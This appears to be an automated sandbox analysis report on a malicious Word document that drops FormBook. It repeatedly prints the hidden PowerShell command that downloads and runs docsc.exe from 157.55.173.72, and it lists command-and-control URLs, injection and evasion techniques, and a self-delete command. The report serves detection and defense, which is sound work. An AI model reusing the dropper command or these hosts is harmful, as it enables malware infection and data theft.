Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe'' Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe'' Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe'' Jump to behavior
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\docsc.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\docsc[1].exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\docsc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match File source: 0000000A.00000002.2116660543.000000000238C000.00000004.00000001.sdmp, type: MEMORY
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Roaming\docsc.exe RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\docsc.exe RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NAPSTAT.EXE RDTSC instruction interceptor: First address: 00000000000885E4 second address: 00000000000885EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NAPSTAT.EXE RDTSC instruction interceptor: First address: 000000000008897E second address: 0000000000088984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_004088B0 rdtsc 12_2_004088B0
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\docsc.exe Thread delayed: delay time: 922337203685477
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3036 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2832 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2448 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2992 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2416 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1664 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\docsc.exe TID: 2948 Thread sleep time: -104068s >= -30000s
Source: C:\Users\user\AppData\Roaming\docsc.exe TID: 2884 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\docsc.exe TID: 2236 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\explorer.exe TID: 2796 Thread sleep time: -35000s >= -30000s
Source: C:\Windows\SysWOW64\NAPSTAT.EXE TID: 2560 Thread sleep time: -44000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\docsc.exe Thread delayed: delay time: 104068
Source: C:\Users\user\AppData\Roaming\docsc.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: powershell.exe, 00000008.00000002.2096210850.000000000037E000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_001D1660 CheckRemoteDebuggerPresent, 10_2_001D1660
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Roaming\docsc.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_004088B0 rdtsc 12_2_004088B0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00409B20 LdrLoadDll, 12_2_00409B20
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_007426F8 mov eax, dword ptr fs:[00000030h] 12_2_007426F8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020B26F8 mov eax, dword ptr fs:[00000030h] 14_2_020B26F8
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\docsc.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\docsc.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.foreverjsdesigns.com
Source: C:\Windows\explorer.exe Network Connect: 202.210.8.86 80
Source: C:\Windows\explorer.exe Network Connect: 44.230.85.241 80
Source: C:\Windows\explorer.exe Domain query: www.southernbrushworks.com
Source: C:\Windows\explorer.exe Network Connect: 184.168.131.241 80
Source: C:\Windows\explorer.exe Network Connect: 209.143.158.10 80
Source: C:\Windows\explorer.exe Network Connect: 75.2.115.196 80
Source: C:\Windows\explorer.exe Domain query: www.boostcoachingonline.com
Source: C:\Windows\explorer.exe Domain query: www.applewholesales.com
Source: C:\Windows\explorer.exe Domain query: www.thepocket-onlinelesson.xyz
Source: C:\Windows\explorer.exe Domain query: www.ethereumdailypay.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe Domain query: www.qqkit.net
Source: C:\Windows\explorer.exe Network Connect: 107.155.89.74 80
Source: C:\Windows\explorer.exe Domain query: www.betsysellsswfl.com
Bypasses PowerShell execution policy
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Roaming\docsc.exe Memory written: C:\Users\user\AppData\Roaming\docsc.exe base: 400000 value starts with: 4D5A
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Roaming\docsc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\docsc.exe Section loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\docsc.exe Section loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Roaming\docsc.exe Thread register set: target process: 1388 Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Thread register set: target process: 1388 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\AppData\Roaming\docsc.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Roaming\docsc.exe Section unmapped: C:\Windows\SysWOW64\NAPSTAT.EXE base address: AA0000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\docsc.exe 'C:\Users\user\AppData\Roaming\docsc.exe' Jump to behavior
Source: C:\Users\user\AppData\Roaming\docsc.exe Process created: C:\Users\user\AppData\Roaming\docsc.exe C:\Users\user\AppData\Roaming\docsc.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\docsc.exe Process created: C:\Users\user\AppData\Roaming\docsc.exe C:\Users\user\AppData\Roaming\docsc.exe Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\docsc.exe' Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE Queries volume information: C:\Users\user\AppData\Local\Temp\OICE_A3A241B7-2F36-435D-B046-C9F74B3487D8.0\FLDA58.tmp VolumeInformation
Source: C:\Users\user\AppData\Roaming\docsc.exe Queries volume information: C:\Users\user\AppData\Roaming\docsc.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\docsc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 0000000E.00000002.2353921064.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2354005709.0000000000340000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2353725750.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2148206889.0000000000470000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2148099844.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2148173672.0000000000430000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2118277990.0000000003365000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 12.2.docsc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.docsc.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 0000000E.00000002.2353921064.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2354005709.0000000000340000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2353725750.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2148206889.0000000000470000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2148099844.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2148173672.0000000000430000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2118277990.0000000003365000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 12.2.docsc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.docsc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Behavior Graph ID: 412069 Sample: 1c60a1e9_by_Libranalysis Startdate: 12/05/2021 Architecture: WINDOWS Score: 100

Process tree recovered from the behavior graph (signatures and network contacts shown per node):

WINWORD.EXE (293 files, 39 registry values) - dropped docsc[1].exe (PE32), FLDA58.tmp, Abctfhghgdghgh .ScT, F3A4D79D.png; Document exploit detected (creates forbidden files); Suspicious powershell command line found; Tries to download and execute files (via powershell); Microsoft Office creates scripting files
  powershell.exe (3 instances) - contacts 157.55.173.72 ports 49165, 49166, 80 (MICROSOFT-CORP-MSN-AS-BLOCKUS, United States); drops C:\Users\user\AppData\Roaming\docsc.exe (PE32); Powershell drops PE file
    docsc.exe - Detected unpacking (changes PE section rights); Machine Learning detection for dropped file; Tries to detect virtualization through RDTSC time measurements; 2 other signatures
      docsc.exe (2 instances) - Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
        explorer.exe (injected) - contacts www.thepocket-onlinelesson.xyz 202.210.8.86 (VECTANTARTERIANetworksCorporationJP, Japan), ethereumdailypay.com 209.143.158.10 (ILANDUS, United States) and 13 other IPs or domains; System process connects to network (likely due to code injection or exploit); Performs DNS queries to domains with low reputation
          NAPSTAT.EXE - Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
            cmd.exe
  FLTLDR.EXE

Sample-level DNS: www.4520oceanviewavenue.com, 4520oceanviewavenue.com. Sample-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 18 other signatures.

Contacted Public IPs

IP Domain Country ASN ASN Name Malicious
209.143.158.10 ethereumdailypay.com United States 14127 ILANDUS true
75.2.115.196 www.applewholesales.com United States 16509 AMAZON-02US true
202.210.8.86 www.thepocket-onlinelesson.xyz Japan 2519 VECTANTARTERIANetworksCorporationJP true
44.230.85.241 uixie.porkbun.com United States 16509 AMAZON-02US false
34.102.136.180 southernbrushworks.com United States 15169 GOOGLEUS false
157.55.173.72 unknown United States 8075 MICROSOFT-CORP-MSN-AS-BLOCKUS true
184.168.131.241 4520oceanviewavenue.com United States 26496 AS-26496-GO-DADDY-COM-LLCUS true
107.155.89.74 betsysellsswfl.com United States 29802 HVC-ASUS true

Contacted Private IPs

IP
192.168.2.22
192.168.2.255

Contacted Domains

Name IP Active
4520oceanviewavenue.com 184.168.131.241 true
betsysellsswfl.com 107.155.89.74 true
ethereumdailypay.com 209.143.158.10 true
www.applewholesales.com 75.2.115.196 true
www.thepocket-onlinelesson.xyz 202.210.8.86 true
uixie.porkbun.com 44.230.85.241 true
boostcoachingonline.com 184.168.131.241 true
southernbrushworks.com 34.102.136.180 true
www.boostcoachingonline.com unknown unknown
www.foreverjsdesigns.com unknown unknown
www.southernbrushworks.com unknown unknown
www.ethereumdailypay.com unknown unknown
www.qqkit.net unknown unknown
www.4520oceanviewavenue.com unknown unknown
www.betsysellsswfl.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.foreverjsdesigns.com/a8si/?bzrD=k28hoff2RzuOUW33PbGIPtKRPUr4n64pf9qOap2xi7OmRFd8c0vHG7pxTFlCjwyFI3/RUg==&yxl4A=IJB8SptPOV true Avira URL Cloud: safe unknown
http://157.55.173.72/goose/docsc.exe true Avira URL Cloud: safe unknown
www.rogegalmish.com/a8si/ true Avira URL Cloud: safe low
http://www.ethereumdailypay.com/a8si/?yxl4A=IJB8SptPOV&bzrD=SdeqJz6wjaIyYsu9X1DHbU17V+TmiEx/wZfEfcHGPKPVmfA4v4050PCPps/OkVYskoJ4SA== true Avira URL Cloud: safe unknown
http://www.thepocket-onlinelesson.xyz/a8si/?bzrD=AKlWb4F2uLtjtixCEtxovY3lKx8NV8ATEUdUvfUwC6/Iyc/MbMvmSS41f7GTUiSOdXxAeQ==&yxl4A=IJB8SptPOV true Avira URL Cloud: safe unknown
http://www.boostcoachingonline.com/a8si/?yxl4A=IJB8SptPOV&bzrD=4F1bkU/FiIiIeThn0vTtPD5XJl4c4IZLVeanHLI3MyhQ3xDAQVTSUto06Vs10btJG4UKsg== true Avira URL Cloud: safe unknown
http://www.southernbrushworks.com/a8si/?yxl4A=IJB8SptPOV&bzrD=gy017r9A0psIMOBT0kV1AOcU5MENAfyqIllJOlDTSwkHuwjyB7K4Ynwu+ZK1UfHNgI+yKg== false Avira URL Cloud: safe unknown
http://www.betsysellsswfl.com/a8si/?bzrD=tsBWpGsRZmy7d7x2nhlySyt7kUJXdizctJsfNrtXFEv4lF0eOqcyqbf0nJIyY4rkKVxBEQ==&yxl4A=IJB8SptPOV true Avira URL Cloud: safe unknown
http://www.applewholesales.com/a8si/?bzrD=UJpr1KJ3cAfqwplpJdbkHVupvAtN4HJ9rDw4p7p43guJdlFHza1zzh6114vkMzwZ//7Ijg==&yxl4A=IJB8SptPOV true Avira URL Cloud: safe unknown
http://www.4520oceanviewavenue.com/a8si/?yxl4A=IJB8SptPOV&bzrD=O3o1U+q5oLWwAo4csM4kzZFzuvGZx18F2JtzSgoGolufYTqxaY4hRtZqS8lk7vb9Od8wBg== true Avira URL Cloud: safe unknown